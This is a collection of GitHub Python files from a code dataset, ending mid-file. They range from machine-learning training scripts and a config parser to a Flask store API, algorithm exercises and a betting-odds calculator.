self.dataset_handler_train.readDatasetTF();\n dataset = dataset.repeat(self.flags.epochs_between_evals);\n dataset = dataset.batch(self.flags.batch_size, drop_remainder=self.flags.enable_dp);\n return dataset;\n\n def _input_fn_eval(self):\n dataset = self.dataset_handler_eval.readDatasetTF();\n dataset = dataset.repeat(1);\n dataset = dataset.batch(self.flags.batch_size);\n return dataset;\n\n def _input_fn_test(self):\n dataset = self.dataset_handler_test.readDatasetTF();\n dataset = dataset.repeat(1);\n dataset = dataset.batch(self.flags.batch_size);\n return dataset;\n\n def export_model(self):\n \"\"\"Export to SavedModel format.\n Args:\n model: Estimator object\n export_dir: directory to export the model.\n \"\"\"\n estimator = self.model.getEstimator();\n deep_columns = self.feature_columns.buildModelColumns()\n feature_spec = tf.feature_column.make_parse_example_spec(deep_columns)\n example_input_fn = (tf.estimator.export.build_parsing_serving_input_receiver_fn(feature_spec))\n r = estimator.export_savedmodel(self.flags.export_dir, example_input_fn)\n\n def _getModelEstimator(self):\n self._setModelDir();\n if self.model is None:\n self.flags.export_dir = os.path.join(self.flags.model_dir, 'export_model');\n if self.mode == 'train':\n # Clean up the model directory if present\n # if not self.flags.model_dir == self.flags.pretrained_model_dir:\n # shutil.rmtree(self.flags.model_dir, ignore_errors=True)\n self.model = NeuralNetEstimator(self.feature_columns, self.flags,\n self.dataset_handler_train.dataset.getNumSamplesBalancedSubset());\n if self.mode == 'test':\n self.model = NeuralNetEstimator(self.feature_columns, self.flags,\n self.dataset_handler_test.dataset.getNumSamplesBalancedSubset());\n\n def createDatasets(self):\n if self.mode == 'train':\n if self.dataset_options_eval is not None:\n dataset_maker_train = NeuralNetDatasetMaker('train', self.flags.model_dir, self.dataset_options_train);\n dataset_maker_eval = NeuralNetDatasetMaker('eval', self.flags.model_dir, self.dataset_options_eval);\n dataset_maker_train.createDatasets();\n dataset_maker_eval.createDatasets();\n else:\n # dataset_maker = NeuralNetDatasetMaker('traineval', self.flags.model_dir, self.dataset_options_train, balanced_datasets=False);\n dataset_maker = NeuralNetDatasetMaker('traineval', self.flags.model_dir, self.dataset_options_train);\n dataset_maker.createDatasets();\n elif self.mode == 'test':\n dataset_maker = NeuralNetDatasetMaker('test', self.flags.model_dir, self.dataset_options_test);\n dataset_maker.createDatasets();\n\n def removeDatasets(self):\n if self.mode == 'test':\n dataset_maker = NeuralNetDatasetMaker('test', self.flags.model_dir, self.dataset_options_test);\n dataset_maker.removeDatasets();\n else:\n print('removing datasets is only possible in test mode...exit')\n sys.exit()\n\n def train(self):\n\n self.createDatasets();\n\n if self.model is None:\n self._getModelEstimator();\n\n\n estimator = self.model.getEstimator();\n\n run_params = {\n 'batch_size': self.flags.batch_size,\n 'train_epochs': self.flags.train_epochs,\n 'model_type': 'deep',\n }\n\n benchmark_logger = logger.config_benchmark_logger(self.flags)\n benchmark_logger.log_run_info('deep', 'Readmission Patient', run_params)\n\n # Train and evaluate the model every `flags.epochs_between_evals` epochs.\n for n in range(self.flags.train_epochs // self.flags.epochs_between_evals):\n # Break from loop if privacy budget is exceedeed and differential privacy is enabled\n if self.flags.enable_dp and self.model.is_privacy_budget_exceeded():\n break\n\n print('n: ' + str(n))\n estimator.train(input_fn=self._input_fn_train)\n results = estimator.evaluate(input_fn=self._input_fn_eval)\n # Display evaluation metrics\n tf.logging.info('Results at epoch %d / %d', (n + 1) * self.flags.epochs_between_evals,\n self.flags.train_epochs)\n tf.logging.info('-' * 60)\n\n for key in sorted(results):\n tf.logging.info('%s: %s' % (key, results[key]))\n\n benchmark_logger.log_evaluation_result(results)\n\n if model_helpers.past_stop_threshold(self.flags.stop_threshold, results['accuracy']):\n break\n\n # Export the model\n print('export the model?')\n if n % 10 == 0 and self.flags.export_dir is not None:\n self.export_model()\n\n def predict(self):\n if self.model is None:\n self._getModelEstimator();\n\n self.createDatasets();\n estimator = self.model.getEstimator();\n results = estimator.predict(input_fn=self._input_fn_test)\n # self.removeDatasets();\n return results;\n\n def getModelDir(self):\n return self.flags.model_dir;\n\n def getFlags(self):\n return self.flags;\n\n def getFilenameDatasetBalanced(self):\n if self.mode == 'train':\n return self.dataset_handler_train._getFilenameDatasetBalanced();\n elif self.mode == 'eval':\n return self.dataset_handler_eval._getFilenameDatasetBalanced();\n elif self.mode == 'test':\n return self.dataset_handler_test._getFilenameDatasetBalanced();\n else:\n print('unknown mode...exit')\n sys.exit();\n\n def getWeightsEmbeddingLayer(self, name_embedding):\n if name_embedding == 'main_diag':\n name_embedding_variable = self.feature_columns.getEmbeddingLayerNames()[0];\n elif name_embedding == 'diag':\n name_embedding_variable = self.feature_columns.getEmbeddingLayerNames()[1];\n else:\n print('embedding is unknown...exit')\n sys.exit();\n estimator = self.model.getEstimator();\n values = estimator.get_variable_value(name_embedding_variable)\n return values;\n","repo_name":"MedicalDataScience/PATREC","sub_path":"learning/neuralnet/NeuralNetModel.py","file_name":"NeuralNetModel.py","file_ext":"py","file_size_in_byte":10945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"21286164996","text":"\"\"\"\nProblem statement: https://leetcode.com/problems/longest-palindromic-substring/\nSolution explained: https://www.youtube.com/watch?v=y2BD4MJqV20&ab_channel=NickWhite\nPassed all tests--> Yess!!!\nComplexity -- Time-> 0(n^2)\n\t\t\t\tSpace --> O(1)\n\"\"\"\n\ndef get_longest_palindrome_recursive(s):\n\tn = len(s)\n\tif n == 0:\n\t\treturn \"\"\n\tif n == 1:\n\t\treturn s\n\n\tstart = 0\n\tend = 0\n\tfor ii in range(n):\n\t\tlen_one = expand_from_middle(s, ii, ii)\n\t\tlen_two = expand_from_middle(s, ii, ii+1)\n\t\tlength = max(len_one, len_two)\n\t\tif length > (end - start):\n\t\t\tstart = ii - length//2\n\t\t\tend = ii + length//2\n\treturn s[start:end+1]\n\n\ndef expand_from_middle(s, left, right):\n\tif len(s) == 0 or left > right: return \"\"\n\tn = len(s)\n\n\twhile left >= 0 and right < n and s[left] == s[right]:\n\t\tleft -= 1\n\t\tright += 1\n\treturn right-left-1\n\n\nprint(get_longest_palindrome_recursive(\"cbbd\"))\n","repo_name":"ssbagalkar/PythonDataStructuresPractice","sub_path":"DP-aditya-verma-playlist/LCS/11_Leetcode-Longest-Palindrome-substring.py","file_name":"11_Leetcode-Longest-Palindrome-substring.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10512760676","text":"###############################################################################\n#\n# configglue -- glue for your apps' configuration\n#\n# A library for simple, DRY configuration of applications\n#\n# (C) 2009--2013 by Canonical Ltd.\n# by John R. Lenton \n# and Ricardo Kirkner \n#\n# Released under the BSD License (see the file LICENSE)\n#\n# For bug reports, support, and new releases: http://launchpad.net/configglue\n#\n###############################################################################\n\n\"\"\" TypedConfigParser lives here \"\"\"\n\nimport os\n\nfrom configglue._compat import text_type\nfrom . import parsers\nfrom .attributed import AttributedConfigParser\n\n\nclass TypedConfigParser(AttributedConfigParser):\n \"\"\"Building on AttributedConfigParser, handle the idea of having a\n configuration file that knows what type its options are.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(TypedConfigParser, self).__init__(*args, **kwargs)\n self.parsers = {'bool': parsers.bool_parser,\n 'complex': complex,\n 'float': float,\n 'int': int,\n 'lines': parsers.lines,\n 'unicode': text_type,\n 'getenv': os.getenv,\n None: lambda x: x}\n\n def add_parser(self, name, parser, clobber=False):\n \"\"\"Add a custom parser\n\n @param name: the name with which you can ask for this parser\n in the configuration file\n @param parser: the parser itself\n @param clobber: whether to overwite an existing parser\n \"\"\"\n if name not in self.parsers or clobber:\n self.parsers[name] = parser\n else:\n raise ValueError('A parser by that name already exists')\n\n def add_parsers(self, *args):\n \"\"\"Add multiple custom parsers\n\n @param args: any number of (name, parser, [clobber]) tuples\n \"\"\"\n for arg in args:\n self.add_parser(*arg)\n\n def parse(self, section, option):\n \"\"\"Parse a single option in a single section.\n\n This actually consumes the 'parser', 'parser_args' and 'default'\n attributes.\n\n @param section: the section within which to look for the option\n @param option: the 'base' option to parse\n \"\"\"\n super(TypedConfigParser, self).parse(section, option)\n\n value = self.get(section, option)\n\n if 'default.parser' in value.attrs:\n parser = self.parsers[value.attrs.pop('default.parser')]\n value.attrs['default'] = parser(value.attrs['default'])\n\n if value.is_empty:\n if 'default' in value.attrs:\n value.value = value.attrs['default']\n else:\n value.value = None\n\n if 'parser' in value.attrs:\n args = value.attrs.pop('parser.args', ())\n if args != ():\n args_parser = value.attrs.pop('parser.args.parser', 'lines')\n args = self.parsers[args_parser](args)\n # leave the parser hanging around for if you need it later\n value.parser = self.parsers[value.attrs.pop('parser')]\n value.value = value.parser(value.value, *args)\n else:\n value.parser = self.parsers[None]\n\n # tadaa!\n self.set(section, option, value)\n","repo_name":"nessita/configglue","sub_path":"configglue/inischema/typed.py","file_name":"typed.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"14390331040","text":"import sys\n\nsys.path.append(\"..\")\n\nfrom math import ceil\nfrom pathlib import Path\nfrom typing import Callable, List\n\nimport h5py\nimport torch\nimport torch.nn.functional as F\nfrom hesiod import hcfg, hmain\nfrom pycarus.datasets.manifold40 import Manifold40\nfrom pycarus.geometry.mesh import compute_sdf_from_mesh, get_o3d_mesh_from_tensors\nfrom pycarus.geometry.pcd import random_point_sampling, shuffle_pcd\nfrom pycarus.learning.models.siren import SIREN\nfrom pycarus.transforms.pcd import NormalizePcdIntoUnitSphere, RandomScalePcd\nfrom pycarus.utils import progress_bar\nfrom torch.optim import Adam\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom utils import get_mlps_batched_params, mlp_batched_forward\n\n\nclass InrsDatasetCreator:\n def __init__(self) -> None:\n self.dset_name = hcfg(\"dset_name\", str)\n self.mesh_root = Path(hcfg(\"mesh_root\", str))\n self.splits = hcfg(\"splits\", List[str])\n\n self.num_queries_on_surface = hcfg(\"num_queries_on_surface\", int)\n self.stds = hcfg(\"stds\", List[float])\n self.num_points_per_std = hcfg(\"num_points_per_std\", List[int])\n\n self.num_required_train_shapes = hcfg(\"num_required_train_shapes\", int)\n dset = self.get_dataset(\"train\")\n num_train_shapes = len(dset) # type: ignore\n self.num_augmentations = ceil(self.num_required_train_shapes / num_train_shapes) - 1\n\n self.num_points_fitting = hcfg(\"num_points_fitting\", int)\n self.num_parallel_mlps = hcfg(\"num_parallel_mlps\", int)\n self.hdim = hcfg(\"mlp.hidden_dim\", int)\n self.num_hidden_layers = hcfg(\"mlp.num_hidden_layers\", int)\n self.mlp_init_path = Path(hcfg(\"mlp.init_path\", str))\n\n self.num_steps = hcfg(\"num_steps\", int)\n self.lr = hcfg(\"lr\", float)\n\n self.out_root = Path(hcfg(\"out_root\", str))\n self.out_root.mkdir(parents=True)\n\n def build_mlp(self) -> SIREN:\n mlp = SIREN(\n input_dim=3,\n hidden_dim=self.hdim,\n num_hidden_layers=self.num_hidden_layers,\n out_dim=1,\n )\n\n mlp.load_state_dict(torch.load(self.mlp_init_path))\n\n return mlp\n\n def get_dataset(self, split: str, transforms: List[Callable] = []) -> Dataset:\n if self.dset_name == \"manifold40\":\n dset = Manifold40(self.mesh_root, split, vertices_transforms=transforms, only_version=0)\n else:\n raise ValueError(\"Unknown dataset.\")\n return dset\n\n def create_dataset(self) -> None:\n for split in self.splits:\n global_idx = 0\n\n augs = [False]\n if \"train\" in split:\n augs += [True] * self.num_augmentations\n\n for num_aug, aug in enumerate(augs):\n if aug:\n transforms = [\n RandomScalePcd(2 / 3, 3 / 2),\n NormalizePcdIntoUnitSphere(),\n ]\n else:\n transforms = [NormalizePcdIntoUnitSphere()]\n\n dset = self.get_dataset(split, transforms)\n\n loader = DataLoader(dset, self.num_parallel_mlps, num_workers=0)\n\n desc = f\"Fitting {split} set (aug {num_aug + 1}/{len(augs)})\"\n for batch in progress_bar(loader, desc, num_cols=80):\n vertices, triangles, class_ids, num_vertices, num_triangles = batch\n bs = len(vertices)\n\n coords = []\n labels = []\n\n for idx in range(bs):\n num_v = num_vertices[idx]\n v = vertices[idx][:num_v]\n num_t = num_triangles[idx]\n t = triangles[idx][:num_t]\n mesh_o3d = get_o3d_mesh_from_tensors(v, t)\n\n mesh_coords, mesh_labels = compute_sdf_from_mesh(\n mesh_o3d,\n num_queries_on_surface=self.num_queries_on_surface,\n queries_stds=self.stds,\n num_queries_per_std=self.num_points_per_std,\n coords_range=(-1, 1),\n )\n coords.append(mesh_coords)\n labels.append(mesh_labels)\n\n coords = torch.stack(coords, dim=0)\n labels = torch.stack(labels, dim=0)\n\n coords_and_labels = torch.cat((coords, labels.unsqueeze(-1)), dim=-1).cuda()\n coords_and_labels = shuffle_pcd(coords_and_labels)\n\n mlps = [self.build_mlp().cuda() for _ in range(bs)]\n batched_params = get_mlps_batched_params(mlps)\n\n optimizer = Adam(batched_params, lr=self.lr)\n\n for _ in progress_bar(range(self.num_steps)):\n selected_c_and_l = random_point_sampling(\n coords_and_labels,\n self.num_points_fitting,\n )\n\n selected_coords = selected_c_and_l[:, :, :3]\n selected_labels = selected_c_and_l[:, :, 3]\n\n pred = mlp_batched_forward(batched_params, selected_coords)\n\n selected_labels = (selected_labels + 0.1) / 0.2\n loss = F.binary_cross_entropy_with_logits(pred, selected_labels)\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n for idx in range(bs):\n v = vertices[idx]\n num_v = num_vertices[idx]\n t = triangles[idx]\n num_t = num_triangles[idx]\n\n class_id = class_ids[idx]\n\n crd = coords[idx]\n lbl = labels[idx]\n\n flattened_params = [p[idx].view(-1) for p in batched_params]\n flattened_params = torch.cat(flattened_params, dim=0)\n\n h5_path = self.out_root / split / f\"{global_idx}.h5\"\n h5_path.parent.mkdir(parents=True, exist_ok=True)\n\n with h5py.File(h5_path, \"w\") as f:\n f.create_dataset(\"vertices\", data=v.detach().cpu().numpy())\n f.create_dataset(\"num_vertices\", data=num_v.detach().cpu().numpy())\n f.create_dataset(\"triangles\", data=t.detach().cpu().numpy())\n f.create_dataset(\"num_triangles\", data=num_t.detach().cpu().numpy())\n f.create_dataset(\"params\", data=flattened_params.detach().cpu().numpy())\n f.create_dataset(\"class_id\", data=class_id.detach().cpu().numpy())\n if split == \"train\":\n f.create_dataset(\"coords\", data=crd.detach().cpu().numpy())\n f.create_dataset(\"labels\", data=lbl.detach().cpu().numpy())\n\n global_idx += 1\n\n\n@hmain(base_cfg_dir=\"cfg/bases\", template_cfg_file=\"cfg/inrs_dataset.yaml\", create_out_dir=False)\ndef main() -> None:\n dset_creator = InrsDatasetCreator()\n dset_creator.create_dataset()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CVLAB-Unibo/inr2vec","sub_path":"mesh_classification/create_inrs_dataset.py","file_name":"create_inrs_dataset.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"51"} +{"seq_id":"13799047523","text":"from dotenv import load_dotenv, find_dotenv, set_key, unset_key, dotenv_values\n\nenv_path = find_dotenv()\nload_dotenv(env_path)\n\ndef set_variable(env_name, value):\n set_key(env_path, f\"export {env_name.upper()}\", str(value))\n print(f\"Environment Variable set\\n{env_name.upper()}={str(value)}\\n at {env_path}\")\n\n\nwhile True:\n option = input(\"\\n[1] Change environment config (Prod, Dev) or \\n[2] Add custom environment varibale\\n\")\n if option == str(1):\n while True:\n value = input(f\"\\nWhat config to select?\\n[1] Development\\n[2] Production\\n\")\n print(dotenv_values())\n if value == str(1):\n unset_key(env_path, f\"APP_SETTINGS\")\n set_variable(\"APP_SETTINGS\", \"config.DevelopmentConfig\")\n break\n elif value == str(2):\n unset_key(env_path, f\"APP_SETTINGS\")\n set_variable(\"APP_SETTINGS\", \"config.ProductionConfig\")\n break\n else:\n print(\"Invalid choice, try 1 or 2\")\n break\n elif option == str(2):\n env_name = input(\"What is the name of your environment variable?\\n\")\n value = input(f\"\\nWhat is the value to set for {env_name}\\n\")\n unset_key(env_path, env_name)\n set_variable(env_name, value)\n break\n else:\n print(\"Invalid choice, try 1 or 2\")\n","repo_name":"rishFilet/flask_upload_files","sub_path":"set_environment.py","file_name":"set_environment.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39675139490","text":"#Escreva um programa que leia um conjunto de 10 números inteiros. Calcule e mostre:\n#a)o menor número\n#b)a soma dos números pares e maiores que 10\n#c)a quantidade de números ímpares\n#d)a média dos números maiores que 20\n\nsoma = 0\nmedia = 0\ncontador = 0\nimpares = 0\nlista = []\n\nfor i in range(10):\n numero = int(input(\"Digite um número: \"))\n\n lista.append(numero)\n\n if numero > 10 and numero % 2 == 0:\n soma = soma + numero\n if numero % 2 != 0:\n impares = impares+1\n if numero > 20:\n contador = contador+1\n\n media = media + numero\n\nprint(lista)\nprint(\"O menor número da sua lista: \", min(lista))\nprint(\"A soma dos números pares e maiores que 10: \", soma)\nprint(\"A quantidade de números ímpares: \", impar)\nprint(\"A media dos números maiores que 20 eh: \", media/contador)\n","repo_name":"sandroschutt/Python","sub_path":"listasLP/lista_01/exercicio_01.py","file_name":"exercicio_01.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20935679388","text":"import os\n\nfrom flask import Flask, jsonify, request\nfrom flasgger import Swagger, LazyString, LazyJSONEncoder\nfrom flasgger import swag_from\nimport boto3, json\n\napp = Flask(__name__)\nstores = [\n {\n 'name': 'Flower_store',\n 'items': [\n {\n 'name': 'Roses',\n 'price': 100\n }\n ]\n },\n {\n 'name': 'Books_store',\n 'items': [\n {\n 'name': 'Python Programming',\n 'price': 100\n }\n ]\n }\n]\n\napp.json = LazyJSONEncoder\n\n\nswagger_template = dict(\ninfo = {\n 'title': LazyString(lambda: 'Swagger File for Our Store'),\n 'version': LazyString(lambda: '0.1'),\n 'description': LazyString(lambda: 'This document depicts a sample Swagger UI document and implements Store'\n 'functionality after executing GET and POST methods'),\n },\n host = LazyString(lambda: request.host)\n)\n\n\nswagger_config = {\n \"headers\": [],\n \"specs\": [\n {\n \"endpoint\": 'store',\n \"route\": '/store.json',\n \"rule_filter\": lambda rule: True,\n \"model_filter\": lambda tag: True,\n }\n ],\n \"static_url_path\": \"/flasgger_static\",\n \"swagger_ui\": True,\n \"specs_route\": \"/storeapi/\"\n}\n\nswagger = Swagger(app, template=swagger_template,\n config=swagger_config)\n@swag_from(\"store.yml\", methods=['GET','POST'])\n\n@app.route('/')\ndef home():\n return \"Welcome to Store_Api\"\n\n\n@app.route('/store', methods=['POST'])\ndef create_store():\n request_data = request.get_json()\n new_store = {\n 'name': request_data['name'],\n 'items': []\n }\n stores.append(new_store)\n return jsonify(new_store)\n\n\n@app.route('/store/')\ndef get_store_name(name):\n for store in stores:\n if(store['name'] == name):\n return jsonify(store)\n return jsonify({'message': 'store not found'})\n\n\n@app.route('/store')\ndef get_all_store_name():\n return jsonify({'stores': stores})\n\n\n@app.route('/store//item', methods=['POST'])\ndef create_store_item(name):\n request_data = request.get_json()\n for store in stores:\n if(store['name'] == name):\n new_item = {\n 'name': request_data['name'],\n 'price': request_data['price']\n }\n store['items'].append(new_item)\n return jsonify(new_item)\n return jsonify({'message':'store not found'})\n\n\n@app.route('/store//item')\ndef get_store_item(name):\n for store in stores:\n if(store['name'] == name):\n return jsonify(store['items'])\n return jsonify({'message': 'store not found'})\n\nswagger_template = dict(\ninfo = {\n 'title': LazyString(lambda: 'Swagger File for Our Store'),\n 'version': LazyString(lambda: '0.1'),\n 'description': LazyString(lambda: 'This document depicts a sample Swagger UI document and implements Store'\n ' functionality after executing GET and POST methods'),\n },\n host = LazyString(lambda: request.host)\n)\n\n\n\n\nsqs = boto3.resource('sqs', region_name='ap-south-1')\nqueue = sqs.create_queue(QueueName='Storequeue', Attributes={'DelaySeconds': '10', 'VisibilityTimeout': '30'})\nqueue2 = sqs.get_queue_by_name(QueueName='Storequeue')\nprint(queue2.attributes)\nresponse = queue.send_message(MessageBody='Hey, Welcome to the store')\nprint(response.get('MessageId'))\nprint(response.get('MD5OfMessageBody'))\nregion_name = 'ap-south-1'\nqueue_name = 'Storequeue'\nmax_queue_messages = 10\nmessage_bodies = []\n# aws_access_key_id = ''\n# aws_secret_access_key = ''\n# client = boto3.client('sqs', aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)\n\nsession = boto3.Session(region_name='ap-south-1', aws_access_key_id=os.environ.get('aws_access_key_id'), aws_secret_access_key=os.environ.get('aws_secret_access_key'))\nec2 = session.client('sqs')\n\n\n# sqs = boto3.resource('sqs', region_name=region_name,\n# aws_access_key_id=ACCESS_KEY,\n# aws_secret_access_key=SECRET_KEY)\n\nqueue = sqs.get_queue_by_name(QueueName=queue_name)\n\napp.run(port=9090)","repo_name":"ChaitanyaDevnikar/Store_api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"47041411281","text":"from collections import defaultdict\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\n\n\ndef solution(k, room_number):\n dct = defaultdict(int)\n used = [False] * (k + 1)\n ans = []\n for room in room_number:\n if used[room] == False:\n used[room] = True\n\n # v = room+1\n # tmp = [v]\n # while used[v] == True:\n # v = dct[v]\n # tmp.append(v)\n dct[room] = room + 1\n\n ans.append(room)\n else:\n alter = dct[room]\n tmp = []\n tmp.append(alter)\n while used[alter] == True:\n alter = dct[alter]\n tmp.append(alter)\n used[alter] = True\n\n for v in tmp:\n dct[v] = alter + 1\n\n # v = alter+1\n # while used[v] == True:\n # v = dct[v]\n # dct[alter] = v\n\n ans.append(alter)\n return ans","repo_name":"bohyunshin/Algorithm_training","sub_path":"카카오/호텔 방 배정.py","file_name":"호텔 방 배정.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29330574898","text":"# from colorama import init, Fore, Back, Style\n#\n# init()\n\n\n\n\n\n\ndef outWhite(text):\n print(\"\\033[37m {}\" .format(text))\n\n\ndef outTurquoise (text):\n print(\"\\033[36m {}\" .format(text))\n\n\ndef out_blue(text):\n print(\"\\033[34m {}\" .format(text))\n\n\n\nlist_password = ['fcgo54lk', 'lfsd432l3821p']\n\nprint('\\n\\n-------START-------\\n')\n\nuser_password = input('Введите пароль\\n')\n\n\n\n\n\ndef calculationOfCoefficients(choise):\n global listRate_1\n global listRate_2\n count = 0\n\n for n in range(totalAmount):\n rate_1 = totalAmount - n\n rate_2 = totalAmount - rate_1\n overallResult_1 = rate_1 * coefficient_1\n overallResult_2 = rate_2 * coefficient_2\n total_1 = overallResult_1 - totalAmount\n total_2 = overallResult_2 - totalAmount\n if overallResult_1 < totalAmount or overallResult_2 < totalAmount:\n continue\n\n listRate_1.append(rate_1)\n listRate_2.append(rate_2)\n listTotal_1.append(total_1)\n listTotal_2.append(total_2)\n listOverallResult_1.append(overallResult_1)\n listOverallResult_2.append(overallResult_2)\n if choise == 0:\n count += 1\n print('Твой выигрыш первого события -', total_1, 'р, ', 'Твой выигрыш второго события -', total_2, 'р')\n print('Итого средств первого события', overallResult_1, 'Итого средств второго события', overallResult_2, '\\nСтавка на первое событие', rate_1,\n 'Ставка на второе событие', rate_2, '\\n')\n print('Всего событий: {}'.format(count))\n\n\n\nstate_user = 0\n\n\n\nwhile True:\n\n\n if user_password in list_password:\n print('Аккаунт подтвержден!\\n')\n else:\n print('Пароль неверный\\n')\n break\n\n coefficient_1 = float(input('Введите коэфицент на первую команду '))\n coefficient_2 = float(input('Введите коэффицент на вторую команду '))\n totalAmount = int(input('Какую сумму хотите поставить? '))\n\n\n listRate_1 = []\n listRate_2 = []\n listTotal_1, listTotal_2 = [], []\n listOverallResult_1, listOverallResult_2 = [], []\n\n\n\n\n valRate_1 = 0\n if len(listRate_1) % 2 == 0:\n val = len(listRate_1) // 2\n else:\n val = len(listRate_1) + 1 // 2\n\n valTotal_1 = 0\n if len(listTotal_1) % 2 == 0:\n val = len(listTotal_1) // 2\n else:\n val = len(listTotal_1) + 1 // 2\n\n valOverallResult_1 = 0\n if len(listOverallResult_1) % 2 == 0:\n val = len(listOverallResult_1) // 2\n else:\n val = len(listOverallResult_1) + 1 // 2\n\n\n valRate_2 = 0\n if len(listRate_2) % 2 == 0:\n val = len(listRate_2) // 2\n else:\n val = len(listRate_2) + 1 // 2\n\n valTotal_2 = 0\n if len(listTotal_2) % 2 == 0:\n val = len(listTotal_2) // 2\n else:\n val = len(listTotal_2) + 1 // 2\n\n valOverallResult_2 = 0\n if len(listOverallResult_2) % 2 == 0:\n val = len(listOverallResult_2) // 2\n else:\n val = len(listOverallResult_2) + 1 // 2\n\n\n\n\n choiceUser = int(input('Что хочешь узнать? \\n'\n '0. Вывести результат всех возможных событий \\n'\n '1. Вывести результат первой ставки \\n'\n '2. Вывести результат второй ставки \\n'\n '3. Вывести средний результат \\n'\n '4. Посмотреть все события \\n'\n 'Вводить цифры '))\n\n calculationOfCoefficients(choiceUser)\n\n\n\n if choiceUser == 1:\n print('\\nИтог первой ставки \\n'\n 'Победа первой команды: \\n'\n 'Ставка:', listRate_1[0], '\\n'\n 'Выигрыш:', listTotal_1[0], '\\n'\n 'Итоговый результат:', listOverallResult_1[0], '\\n'\n '\\nПобеда второй команды: \\n'\n 'Ставка:', listRate_2[0], '\\n'\n 'Выигрыш:', listTotal_2[0], '\\n'\n 'Итоговый результат:', listOverallResult_2[0], '\\n'\n )\n\n if choiceUser == 2:\n print('\\nИтог второй ставки \\n'\n 'Победа первой команды: \\n'\n 'Ставка:', listRate_1[-1], '\\n'\n 'Выигрыш:', listTotal_1[-1], '\\n'\n 'Итоговый результат:', listOverallResult_1[-1], '\\n'\n '\\nПобеда второй команды: \\n'\n 'Ставка:', listRate_2[-1], '\\n'\n 'Выигрыш:', listTotal_2[-1], '\\n'\n 'Итоговый результат:', listOverallResult_2[-1], '\\n'\n )\n\n\n if choiceUser == 3:\n print('\\nСредний результат: \\n'\n 'Победа первой команды: \\n'\n 'Ставка:', listRate_1[valRate_1], '\\n'\n 'Выигрыш:', listTotal_1[valTotal_1], '\\n'\n 'Итоговый результат:', listOverallResult_1[valOverallResult_1], '\\n'\n '\\nПобеда второй команды: \\n'\n 'Ставка:', listRate_2[valRate_2], '\\n'\n 'Выигрыш:', listTotal_2[valTotal_2], '\\n'\n 'Итоговый результат:', listOverallResult_2[valOverallResult_2], '\\n'\n )\n\n if choiceUser == 4:\n print('\\nАкцент на первое событие {} \\n'\n 'Победа первой команды: \\n'\n 'Ставка:', listRate_1[0], '\\n'\n 'Выигрыш:', listTotal_1[0], '\\n'\n 'Всего средств:', listOverallResult_1[0], '\\n'\n '\\nПобеда второй команды: \\n'\n 'Ставка:', listRate_2[0], '\\n'\n 'Выигрыш:', listTotal_2[0], '\\n'\n 'Всего средств:', listOverallResult_2[0], '\\n'\n '\\n\\nАкцент на второе событие{} \\n'\n 'Победа первой команды: \\n'\n 'Ставка:', listRate_1[-1], '\\n'\n 'Выигрыш:', listTotal_1[-1], '\\n'\n 'Всего средств:', listOverallResult_1[-1], '\\n'\n '\\nПобеда второй команды: \\n'\n 'Ставка:', listRate_2[-1], '\\n'\n 'Выигрыш:', listTotal_2[-1], '\\n'\n 'Всего средств:', listOverallResult_2[-1], '\\n'\n '\\n\\nСредний результат: \\n'\n 'Победа первой команды: \\n'\n 'Ставка:', listRate_1[valRate_1], '\\n'\n 'Выигрыш:', listTotal_1[valTotal_1], '\\n'\n 'Всего средств:', listOverallResult_1[valOverallResult_1], '\\n'\n '\\nПобеда второй команды: \\n'\n 'Ставка:', listRate_2[valRate_2], '\\n'\n 'Выигрыш:', listTotal_2[valTotal_2], '\\n'\n 'Всего средств:', listOverallResult_2[valOverallResult_2], '\\n'\n )\n user_exit = int(input('Сделать еще раз ставку?\\n'\n '1.Еще раз!\\n2.Выход '))\n if user_exit == 2:\n print('\\n\\n------Bye Bye------')\n break\n\n\n\n# Если кто-то дочитал до этого момента и понял насколько это дно в плане проектировании,\n# то мои Вам сочуствия, изначально я писал код не для публики, сильно не заморачивался. Спасибо за понимание!","repo_name":"Trigger0fficial/forecast_V1","sub_path":"forecast/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":8076,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15630679363","text":"from typing import Any, Dict, Optional, Union\n\nimport httpx\n\nfrom ...client import Client\nfrom ...models.get_asset_info_response_200 import GetAssetInfoResponse200\nfrom ...types import UNSET, Response, Unset\n\n\ndef _get_kwargs(\n *,\n client: Client,\n asset: Union[Unset, None, str] = UNSET,\n aclass: Union[Unset, None, str] = UNSET,\n) -> Dict[str, Any]:\n url = \"{}/public/Assets\".format(client.base_url)\n\n headers: Dict[str, str] = client.get_headers()\n cookies: Dict[str, Any] = client.get_cookies()\n\n params: Dict[str, Any] = {}\n params[\"asset\"] = asset\n\n params[\"aclass\"] = aclass\n\n params = {k: v for k, v in params.items() if v is not UNSET and v is not None}\n\n return {\n \"method\": \"get\",\n \"url\": url,\n \"headers\": headers,\n \"cookies\": cookies,\n \"timeout\": client.get_timeout(),\n \"params\": params,\n }\n\n\ndef _parse_response(*, response: httpx.Response) -> Optional[GetAssetInfoResponse200]:\n if response.status_code == 200:\n response_200 = GetAssetInfoResponse200.from_dict(response.json())\n\n return 